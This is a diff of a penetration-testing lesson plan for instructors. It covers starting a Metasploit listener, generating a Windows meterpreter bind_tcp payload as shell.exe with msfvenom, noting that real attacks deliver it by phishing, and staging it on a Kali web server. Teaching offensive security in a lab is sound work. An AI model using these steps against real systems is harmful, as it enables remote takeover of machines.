rtucker1/TrilogyDemo/LessonPlan.md

 6. Once LPORT and LHOST is set, start the listener by typing `run -j`.
 The `-j` option sets it to run in background.

+Explain to students now that Metasploit listener is running, our Kali machine is now acting as a C2 server running Metasploit as a C2 framework.
+Now that we have our C2 server running, we need to generate an agent to be used.

 7. Next, generate the agent/payload by typing `msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe`

 ![](/Images/02.Metasploitmsfvenom.PNG)

+Explain to students that since we've now created our agent in a .exe format, we need to transport it to the target some how.
+Typically in a real engagement, this is done through phishing or social engineering.
+For our demonstration, we will host it on a web server on our Kali machine.

 8. Clear out the /var/www/html/ folder: `rm /var/www/html/*`